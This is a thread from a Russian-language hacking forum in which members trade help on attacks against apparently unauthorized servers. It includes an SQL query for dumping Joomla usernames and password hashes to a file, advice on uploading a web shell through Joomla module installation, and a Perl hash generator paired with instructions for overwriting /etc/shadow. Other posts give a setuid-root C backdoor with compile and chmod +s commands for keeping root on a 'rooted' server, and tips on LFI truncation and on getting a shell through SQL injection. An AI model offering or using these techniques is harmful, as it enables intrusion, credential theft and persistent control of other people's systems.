Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    ну надо уточнять сначала чем сливал
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    слил через php шелл, SQL Dump created by P.A.S.
    сливает в таком формате:
     
    _________________________
    #16122 winstrool, 18 Feb 2011
    Last edited: 18 Feb 2011
  3. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    я бы сделал слегка поизвращенски:
    1) восстановил бы таблицу на локалке
    2) сделал чтото типа такого запроса:
    SELECT group_concat(username,password separator '\n\r') FROM `jos_users` into outfile 'C:/1111.txt'
     
    1 person likes this.
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    спасибо, твой метод лудше подошел чем прога тока с запросом:
     
    _________________________
  5. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как заливается шелл в Joomla?

    <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />

    5.0.45-community-nt:root@localhost:Win32

    Доступ к админке есть.
     
    #16125 FlaktW, 19 Feb 2011
    Last edited: 19 Feb 2011
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    если нет ограничений в виде прав на папки то в установке модулей либо ставишь xplorer ..либо сразу шелл льешь..даже если ошибка будет..он по идее должен залится
     
    #16126 Gorev, 19 Feb 2011
    Last edited by a moderator: 19 Feb 2011
  7. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    пожалуйста у кого есть машина под линуксе с перлом сгенерируете для меня хеш пароля 123456

    Code:
    #!/usr/bin/perl
    ################################################################################
    # Generate an MD5 hash for a string.
    # Created to allow me to set a blank Linux password. Required this to create
    # multiple VsFTP accounts with anonymous style credientials.
    #
    # If all you want is the MD5 Hash for NULL (blank password) here's one...
    # $1$VNMbpxGH$sew7cnwH9ixU.x27UbFNn.
    #
    # Advice: If replacing a Linux password with a blank string, ensure you give 
    # the user a shell of /sbin/nologin as you wouldn't want them to login!
    ################################################################################
    # Load dependancies...
    # perl -MCPAN -e 'install Crypt::PasswdMD5'
    ################################################################################
    
    use strict;
    use Crypt::PasswdMD5 qw(unix_md5_crypt);
    my @salt = ( '.', '/', 0 .. 9, 'A' .. 'Z', 'a' .. 'z' );
    my %encrypted;
    
    
    sub abort {
    print "ABORT: $_[0]\n";
    exit 1
    }
    
    
    sub gensalt { #------------------------------------------------------------
    # uses global @salt to construct salt string of requested length
    my $count = shift;
    
    my $salt;
    for (1..$count) {
    $salt .= (@salt)[rand @salt];
    }
    
    return $salt;
    } # end gensalt
    
    
    sub get_encryptedpw { #--------------------------------------------------
    my $unencrypted="$_[0]";
    
    # generate traditional (weak!) DES password, and more modern md5
    $encrypted{des} = crypt( $unencrypted, gensalt(2) );
    $encrypted{md5} = unix_md5_crypt( $unencrypted, gensalt(8) );
    
    return %encrypted;
    }
    
    ################################################################################
    print "Enter password string to encrypt (can be blank) : ";
    my $password = <STDIN>;
    chomp $password;
    
    get_encryptedpw($password);
    
    print "Plaintext \"$password\" = MD5 Hash: $encrypted{md5}\n";
    print "\nReplace the /etc/shadow password string with the above to force pass change\n";
    
    спасибки!
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Active perl тебе о чeм то говорит? или ты думаешь что все кто перл юзают, под линухой? погуглить не судьба?
     
    1 person likes this.
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    rootmd

    $1$iNOGSuEU$lBBSIh0tbH52kf77uy4yX/

    а вообще тебе сюда
     
    _________________________
  10. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    спасибо


    а вот трабла

    порутил сервер, uid=0, gid=0, sh-3.2, доступк по телнету (bind port). я смог открыть порт ssh, но не могу понять почему не получается зайти. (добавил пользователь и вручную ставил хеш в /etc/shadow)...authentication failure....не знаю?!
     
    #16130 rootmd, 19 Feb 2011
    Last edited: 19 Feb 2011
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а зачем ты так палишся на серванте то? зачем новый юзверь..., подрубайся к северу через бекдор, если же он упал .создай себе лазейку..сначала сделай файл
    root.с:
    Код:
    Code:
    main() { 
    setuid(0); 
    setgid(0); 
    system("/bin/bash"); 
    }
    Далее
    Код:

    Code:
    gcc root.c -o syser
    chmod 755 syser
    chmod +s syser
    mv syser /bin/syser
    если бекдор закрылся, запускай из шелла заново и запускай :
    Код:
    Code:
    $ /bin/syser
    id
    uid=0(root) gid=0(wheel) groups=0(wheel),80(www),1003(suwww)
     
    1 person likes this.
  12. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    та проблема в том что у меня шелла нету....нету доступк ssh!
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    раз ты "порутил" сервак, значит доступ у тебя к нему есть...какая проблема залить шелл (если веб-сервак) или bindport.pl и запустить?
     
    1 person likes this.
  14. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    так пхп шелл я давно залил, делал bindport, подключился (telnet), порутил. и как дальше доступк к ssh получить?
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ей Богу тебя не понимаю я...зачем тебе ssh ? какая разница что консоль у тебя на 22 или на 31337 порту?
     
  16. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    ой разница большая, на 11457 порту шелл не bash а sh, нету TERM терминала, а это ограничает мой возможности (например passwd не могу выполнить потому-что он не ждет пока я пасс напишу а уже пишет "Retype unix password")

    и разные Pseudo-terminal will not be allocated because stdin is not a ...
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    не знаю..у меня все работает..
     
  18. Vollkorn

    Vollkorn Member

    Joined:
    6 Nov 2010
    Messages:
    86
    Likes Received:
    15
    Reputations:
    -6
    Здравствуйте. Есть некий сайт, там присутствует local file inclusion, которая дописывает расширение .php. В чем вопрос, знаю можно попытаться отбросить нуль байтом, но когда я пытаюсь это сделать ничего не происходит, еще слышал о 4096 слешах, но даже при их добавлении пишет "Failed opening путь/passwd//////[много слешей]", без расширения. Подскажите пожалуйста что делать.
     
  19. /Montana

    /Montana Elder - Старейшина

    Joined:
    26 Oct 2007
    Messages:
    133
    Likes Received:
    18
    Reputations:
    -1
    Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет).
    Какие сейчас есть варианты получения шела?
     
  20. Vollkorn

    Vollkorn Member

    Joined:
    6 Nov 2010
    Messages:
    86
    Likes Received:
    15
    Reputations:
    -6
    Проверь файловые привилегии, и залей шелл через скуль.
     
Thread Status:
Not open for further replies.